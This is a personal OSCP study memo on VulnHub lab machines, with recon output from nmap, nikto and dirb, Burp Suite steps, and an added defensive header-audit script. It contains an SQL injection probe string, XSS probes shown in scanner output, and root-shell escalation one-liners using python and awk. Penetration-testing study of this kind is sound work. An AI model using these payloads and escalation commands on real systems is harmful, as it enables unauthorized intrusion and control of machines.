[Memo] VulnHub: technique notes

My next certification target is the OSCP. I started doing VulnHub boxes to study for it, so this is a memo for myself.

Reconnaissance

Scanning with nmap

Note: on a slow network link the results may come back incomplete. (-P0 is the old spelling of -Pn, i.e. skip host discovery; -p 1-1023 only covers the privileged port range.)

root@kali:~# nmap -sT -n -P0 -p 1-1023 192.168.1.123
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 22:56 JST
Nmap scan report for 192.168.1.123
Host is up (0.00045s latency).
Not shown: 1011 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
23/tcp  open  telnet
25/tcp  open  smtp
53/tcp  open  domain
80/tcp  open  http
111/tcp open  rpcbind
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
512/tcp open  exec
513/tcp open  login
514/tcp open  shell

Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds

Checking with telnet

root@kali:~# telnet 192.168.1.123 80
Trying 192.168.1.123...
Connected to 192.168.1.123.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 25 Jan 2019 14:08:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html

Connection closed by foreign host.

Checking with netcat

root@kali:~# nc -nv 192.168.1.123 80
(UNKNOWN) [192.168.1.123] 80 (http) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 25 Jan 2019 14:09:04 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Connection: close
Content-Type: text/html

If the version is hidden, see:

How to guess the Apache HTTP Server version

https://www.mbsd.jp/blog/20170904.html

Scanning with nikto

root@kali:~# nikto -host 192.168.1.123 -port 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.123
+ Target Hostname:    192.168.1.123
+ Target Port:        80
+ Start Time:         2019-01-25 23:17:43 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) DAV/2
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>: Output from the phpinfo() function was found.
+ OSVDB-3268: /doc/: Directory indexing found.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpMyAdmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server leaks inodes via ETags, header found with file /phpMyAdmin/ChangeLog, inode: 92462, size: 40540, mtime: Wed Dec 10 02:24:00 2008
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /test/: Directory indexing found.
+ OSVDB-3092: /test/: This might be interesting...
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>: Output from the phpinfo() function was found.
+ /phpinfo.php?cx[]=OmhJkih9vL44LsY1OmPT8rY22Q3yYzofAoZYTrAvV47OLK6Ktupj3L5NXxeesPGalUL9RnCpWsMZoU7Uawqmxn7ZlylQQX0p1ySBA6CYKB9UOE9u19lqYdWvLfZJxsgJ4V0SndAdkXKA3ZK8cJKvBjHM8IWY00FIURcUQgQEgM2zKZuSUQC8wgR6JAb05Pep0
<snip>
cOHuSLwcPfW5cbbDBOPQJhX845BWb1HRH7t7OQ6WTsvNZZ5xJnj7raKaKIh5IK4LxY8OR5S28kTC6fdOpr80<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8347 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2019-01-25 23:18:22 (GMT9) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
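Added example (not from the original post): a small Python checker that reads a raw HEAD response like the ones captured with telnet/nc above and reports the header findings nikto listed (missing X-Frame-Options / X-Content-Type-Options / X-XSS-Protection, version disclosure in Server and X-Powered-By), together with the Apache/PHP setting that fixes each. The sample response is constructed from the headers shown above; the remediation strings are my own mapping.

```python
import re

# Constructed sample: the HEAD / response captured with telnet/nc above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Fri, 25 Jan 2019 14:09:04 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.10\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)

# Hardening headers nikto complained about, with the Apache directive
# (mod_headers) that adds each one.
EXPECTED_HEADERS = {
    "x-frame-options": "Header always set X-Frame-Options SAMEORIGIN",
    "x-content-type-options": "Header always set X-Content-Type-Options nosniff",
    "x-xss-protection": "Header always set X-XSS-Protection \"1; mode=block\"",
}

VERSION_RE = re.compile(r"\d+\.\d+")  # a dotted version number in a header value


def parse_headers(raw):
    """Split a raw HTTP response into (status line, {lowercased name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def audit_response(raw):
    """Return a list of (finding, remediation) tuples for one HEAD/GET response."""
    _, headers = parse_headers(raw)
    findings = []
    for name, fix in EXPECTED_HEADERS.items():
        if name not in headers:
            findings.append((f"missing {name}", fix))
    server = headers.get("server", "")
    if VERSION_RE.search(server):
        findings.append((f"Server header discloses version: {server}",
                         "ServerTokens Prod (and ServerSignature Off)"))
    powered = headers.get("x-powered-by", "")
    if powered:
        findings.append((f"X-Powered-By discloses stack: {powered}",
                         "expose_php = Off in php.ini"))
    return findings


if __name__ == "__main__":
    for finding, fix in audit_response(SAMPLE_RESPONSE):
        print(f"[!] {finding}\n    fix: {fix}")
```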

Running the tools in bulk with SPARTA

It also shows the default passwords for ftp and mysql.

From the Brute tab you can also run a dictionary attack with hydra. The screenshot below is from a reverse brute-force run.


Enumerating directories

root@kali:~# dirb http://192.168.1.3

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 26 22:58:51 2019
URL_BASE: http://192.168.1.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.3/ ----
==> DIRECTORY: http://192.168.1.3/admin/

Web application vulnerabilities

Use Burp Suite. Beforehand, add a FoxyProxy profile pointing at 127.0.0.1:8080.

Once it is running, add the IP address or target domain under "Target".

Choose "yes" in the pop-up that appears when adding it.

Set "Proxy" > "Options" > "Intercept Client Requests" as shown below.

Once traffic shows up in the "Proxy" tab, click "Send to Repeater" to work more efficiently, and iterate on the request in the "Repeater" tab to probe the behaviour.

At this point, use the search box at the bottom right; otherwise following the responses is painful.

After that it is a matter of persistently trying inputs such as ' OR 'A' = '. It is tedious, but satisfying when one works.

Privilege escalation

The classic: python

ted@Toppo:~$ python -c 'import pty; pty.spawn("/bin/sh")'
# whoami
root

awk works too

ted@Toppo:~$ awk '{system("/bin/sh")}'

# whoami
root